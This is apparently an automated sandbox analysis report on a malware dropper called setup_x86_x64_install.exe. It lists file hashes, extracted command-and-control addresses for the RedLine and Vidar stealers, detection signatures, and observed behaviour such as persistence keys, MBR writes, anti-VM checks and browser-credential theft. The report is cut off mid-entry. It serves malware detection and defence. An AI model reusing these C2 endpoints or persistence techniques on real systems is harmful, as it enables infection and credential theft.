Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
23-09-2021 21:08
210923-zyzyaafbfr 1022-09-2021 10:40
210922-mqyzssehck 1022-09-2021 05:21
210922-f114ksecck 1021-09-2021 05:29
210921-f6zspsgdg2 1020-09-2021 21:51
210920-1qj3jafed9 1020-09-2021 19:44
210920-yftswafca9 1020-09-2021 08:28
210920-kczcasgahr 1020-09-2021 04:42
210920-fb3acafedj 1020-09-2021 04:42
210920-fb2zksfecr 10Analysis
-
max time kernel
1157s -
max time network
1201s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
22-09-2021 10:40
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
redlinesmokeloadersocelarsjanesamutsaspackv2backdoordiscoveryevasioninfostealerspywarestealersuricatatrojan
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
gluptebametasploitredlinesocelarsvidarxmrig706utsaspackv2backdoorbootkitdiscoverydropperevasioninfostealerloaderminerpersistencespywarestealersuricatatrojan
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
redlinesmokeloadersocelarsvidar706janesamaspackv2backdoorevasioninfostealerspywarestealersuricatathemidatrojan
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
redlinesocelarsvidarjanesamaspackv2discoveryevasioninfostealerpersistencespywarestealersuricatatrojan
windows11_x64
0 signatures
0 seconds
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
oskiredlineryuksmokeloadersocelarsvidarzloader706janesamrecutsaspackv2backdoorbotnetdiscoveryevasioninfostealerpersistenceransomwarespywarestealersuricatatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20210920
redlinesmokeloadersocelarsvidar706janesamaspackv2backdoordiscoveryevasioninfostealerpersistencespywarestealersuricatatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-en-20210920
redlinesmokeloadersocelarsvidar706janesamrecutsaspackv2backdoorbootkitdiscoveryevasioninfostealerpersistencespywarestealersuricatatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-de-20210920
oskiredlineryuksmokeloadersocelarsvidar706janesamaspackv2backdoorbootkitdiscoveryevasioninfostealerpersistenceransomwarespywarestealersuricatatrojan
windows10_x64
0 signatures
0 seconds
Errors
Reason
Remote task has failed: Machine shutdown
General
-
Target
setup_x86_x64_install.exe
-
Size
4.0MB
-
MD5
73491325fde5366b31c09da701d07dd6
-
SHA1
a4e1ada57e590c2df30fc26fad5f3ca57ad922b1
-
SHA256
56a461a6cc8ad9c10cdc1d19a12d5deceb9ebefb0c871a3fc2eb83c466947a11
-
SHA512
28b5008c542e9c486529934f74774d6d2de4b98531483b24c3c7cf82bf2214b959a1feb0085014026dd278d2a18ac6ae8a0e5a7ebb36be28abf6dccbf2d38e88
Malware Config
Extracted
Family
vidar
Version
40.7
Botnet
706
C2
https://petrenko96.tumblr.com/
Attributes
-
profile_id
706
Extracted
Family
redline
Botnet
UTS
C2
45.9.20.20:13441
Extracted
Family
metasploit
Version
windows/single_exec
Signatures
-
Glupteba Payload 1 IoCs
resource yara_rule behavioral2/memory/2472-300-0x0000000000400000-0x0000000002FBF000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2304 2488 rundll32.exe 101 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
resource yara_rule behavioral2/memory/2508-243-0x0000000000350000-0x000000000036F000-memory.dmp family_redline behavioral2/memory/2508-248-0x0000000000C50000-0x0000000000C6E000-memory.dmp family_redline -
Socelars Payload 3 IoCs
resource yara_rule behavioral2/files/0x00030000000130d9-100.dat family_socelars behavioral2/files/0x00030000000130d9-135.dat family_socelars behavioral2/files/0x00030000000130d9-147.dat family_socelars -
suricata: ET MALWARE AutoHotkey Downloader Checkin via IPLogger
suricata: ET MALWARE AutoHotkey Downloader Checkin via IPLogger
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral2/memory/1652-206-0x0000000001F40000-0x0000000002014000-memory.dmp family_vidar behavioral2/memory/1652-207-0x0000000000400000-0x00000000004D7000-memory.dmp family_vidar -
XMRig Miner Payload 1 IoCs
resource yara_rule behavioral2/memory/3108-359-0x0000000140000000-0x0000000140763000-memory.dmp xmrig -
resource yara_rule behavioral2/files/0x00030000000130d0-77.dat aspack_v212_v242 behavioral2/files/0x00040000000130cb-78.dat aspack_v212_v242 behavioral2/files/0x00030000000130d0-76.dat aspack_v212_v242 behavioral2/files/0x00040000000130cb-79.dat aspack_v212_v242 behavioral2/files/0x00030000000130d2-82.dat aspack_v212_v242 behavioral2/files/0x00030000000130d2-83.dat aspack_v212_v242 -
Blocklisted process makes network request 8 IoCs
flow pid Process 379 2188 MsiExec.exe 381 2188 MsiExec.exe 383 2188 MsiExec.exe 385 2188 MsiExec.exe 387 2188 MsiExec.exe 389 2188 MsiExec.exe 391 2188 MsiExec.exe 392 2188 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts Ze2ro.exe -
Executes dropped EXE 64 IoCs
pid Process 1296 setup_installer.exe 1864 setup_install.exe 1828 Sun1917b8fb5f09db8.exe 1824 Sun1908b94df837b3158.exe 1160 Sun19e4ade31b2a.exe 1832 Sun19262b9e49ad.exe 1696 Sun191101c1aaa.exe 1676 Sun193fda712d9f1.exe 1712 Sun198361825f4.exe 1652 Sun19eb40faaaa9.exe 1772 Sun195a1614ec24e6a.exe 1016 Sun1905815e51282417.exe 1724 Sun1966fb31dd5a07.exe 1264 Sun1966fb31dd5a07.tmp 1968 LzmwAqmV.exe 2196 Chrome 5.exe 2252 PublicDwlBrowser1100.exe 2288 2.exe 2456 Ze2ro.exe 2336 setup.exe 2508 udptest.exe 2536 5.exe 2612 LivelyScreenRecF18.exe 2752 setup_2.exe 2800 3002.exe 2844 jhuuee.exe 2868 setup_2.tmp 2900 BearVpn 3.exe 2976 setup_2.exe 3036 setup_2.tmp 2280 16825021799.exe 2712 04350976466.exe 2472 LzmwAqmV.exe 2864 35378882040.exe 2500 apinesp.exe 1320 services64.exe 2252 Sun19de8ff4b6aefeb8.exe 2652 sihost64.exe 2208 ultramediaburner.exe 2308 ultramediaburner.tmp 2576 Cepesaetozhi.exe 2144 UltraMediaBurner.exe 2220 SHelylaewesy.exe 2820 59768322479.exe 3332 20868724921.exe 3400 90465974774.exe 3532 Garbage Cleaner.exe 3740 Garbage Cleaner.exe 3068 apinesp.exe 1308 GcleanerEU.exe 3100 installer.exe 3160 anyname.exe 2344 gcleaner.exe 3180 autosubplayer.exe 3968 6279.exe 3600 B6B2.exe 3988 athjitf 2240 B6B2.exe 2412 ED6C.exe 1960 LzmwAqmV.exe 1528 B6B2.exe 2024 5DCB.exe 3540 B6B2.exe 1364 B4B2.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 59768322479.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 59768322479.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 16825021799.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 16825021799.exe -
Loads dropped DLL 64 IoCs
pid Process 1100 setup_x86_x64_install.exe 1296 setup_installer.exe 1296 setup_installer.exe 1296 setup_installer.exe 1296 setup_installer.exe 1296 setup_installer.exe 1296 setup_installer.exe 1864 setup_install.exe 1864 setup_install.exe 1864 setup_install.exe 1864 setup_install.exe 1864 setup_install.exe 1864 setup_install.exe 1864 setup_install.exe 1864 setup_install.exe 108 cmd.exe 1156 cmd.exe 1828 Sun1917b8fb5f09db8.exe 1828 Sun1917b8fb5f09db8.exe 616 cmd.exe 616 cmd.exe 1472 cmd.exe 1428 cmd.exe 1468 cmd.exe 1376 cmd.exe 2016 cmd.exe 2016 cmd.exe 1652 Sun19eb40faaaa9.exe 1652 Sun19eb40faaaa9.exe 1672 cmd.exe 1540 cmd.exe 1192 cmd.exe 1772 Sun195a1614ec24e6a.exe 1772 Sun195a1614ec24e6a.exe 1724 Sun1966fb31dd5a07.exe 1724 Sun1966fb31dd5a07.exe 1724 Sun1966fb31dd5a07.exe 1832 Sun19262b9e49ad.exe 1832 Sun19262b9e49ad.exe 1264 Sun1966fb31dd5a07.tmp 1264 Sun1966fb31dd5a07.tmp 1264 Sun1966fb31dd5a07.tmp 1968 LzmwAqmV.exe 1968 LzmwAqmV.exe 1968 LzmwAqmV.exe 1968 LzmwAqmV.exe 1968 LzmwAqmV.exe 1968 LzmwAqmV.exe 1264 Sun1966fb31dd5a07.tmp 2336 setup.exe 1968 LzmwAqmV.exe 1968 LzmwAqmV.exe 1968 LzmwAqmV.exe 2508 udptest.exe 2508 udptest.exe 1968 LzmwAqmV.exe 1968 LzmwAqmV.exe 2752 setup_2.exe 2752 setup_2.exe 1968 LzmwAqmV.exe 1968 LzmwAqmV.exe 2800 3002.exe 2800 3002.exe 1968 LzmwAqmV.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 2532 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Google\\Dyshokasevy.exe\"" Ze2ro.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\1d6eede1-5293-4349-a43e-2da724a3f71a\\B6B2.exe\" --AutoStart" B6B2.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 16825021799.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 59768322479.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\O: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\L: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 14 ip-api.com 311 api.2ip.ua 313 api.2ip.ua 344 api.2ip.ua -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 ED6C.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2280 16825021799.exe 2820 59768322479.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 1320 set thread context of 3108 1320 services64.exe 123 PID 3532 set thread context of 3740 3532 Garbage Cleaner.exe 139 PID 3600 set thread context of 2240 3600 B6B2.exe 186 PID 1528 set thread context of 3540 1528 B6B2.exe 200 PID 632 set thread context of 2968 632 build2.exe 209 -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\lighteningplayer\lua\http\index.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\browse_window.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\README.txt autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\vlm_cmd.xml autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\modules\host.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_imem_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\keystore\libfile_keystore_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libdirectsound_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwasapi_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libnuv_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\http.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libdvdnav_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libes_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libwav_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_ps_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libhttps_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libcaf_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libclone_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_wasapi_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png autosubplayer.exe File created C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk msiexec.exe File created C:\Program Files (x86)\lighteningplayer\lua\meta\reader\filename.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\vlm.xml autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\anevia_streams.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libcdda_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libaiff_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libps_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libsmf_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\gui\libqt_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\custom.lua autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\favicon.ico autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\js\controllers.js autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\libnetsync_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libdirectory_demux_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\librawaud_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe msiexec.exe File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\lighteningplayer\lua\extensions\VLSub.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\newgrounds.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemux_cdg_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libgme_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpegvideo_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\UltraMediaBurner\is-AEVA3.tmp ultramediaburner.tmp File created C:\Program Files (x86)\lighteningplayer\lua\playlist\youtube.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libshm_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\view.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\stream_config_window.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\Other-48.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libimem_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\logger\libfile_logger_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\mosaic_window.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\modules\sandbox.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libasf_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url msiexec.exe File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\lighteningplayer\lua\playlist\rockbox_fm_presets.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\twitch.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libsmb_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_hevc_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\browse.json autosubplayer.exe File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe ultramediaburner.tmp -
Drops file in Windows directory 30 IoCs
description ioc Process File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File opened for modification C:\Windows\Installer\a26e1.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIBB0A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIC651.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI3B26.tmp msiexec.exe File created C:\Windows\Installer\a26e3.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI3DAB.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI5AFD.tmp msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File created C:\Windows\Installer\a26e1.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI1C84.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI71E8.tmp msiexec.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File opened for modification C:\Windows\Installer\MSIAE4D.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF19C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4DE2.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9E15.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIA47C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID3F9.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI772E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4A24.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI853A.tmp msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File opened for modification C:\Windows\Installer\a26e3.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI4903.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI2E88.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9551.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\a26e5.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIDCAF.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 3 IoCs
pid pid_target Process procid_target 1848 2536 WerFault.exe 66 968 1652 WerFault.exe 51 3564 2968 WerFault.exe 209 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun1908b94df837b3158.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun1908b94df837b3158.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun1908b94df837b3158.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 90465974774.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 90465974774.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 B4B2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString B4B2.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 35378882040.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 35378882040.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 20868724921.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 20868724921.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2364 schtasks.exe 1472 schtasks.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 3592 timeout.exe 864 timeout.exe -
Kills process with taskkill 7 IoCs
pid Process 2324 taskkill.exe 2476 taskkill.exe 3552 taskkill.exe 3244 taskkill.exe 1644 taskkill.exe 3600 taskkill.exe 3552 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff6f00000019000000f50400007e020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "339079834" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DOMStorage\bestanimegame.com\ = "1404" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DOMStorage\bestanimegame.com\ = "90" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DOMStorage\bestanimegame.com\Total = "90" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Set value (int) 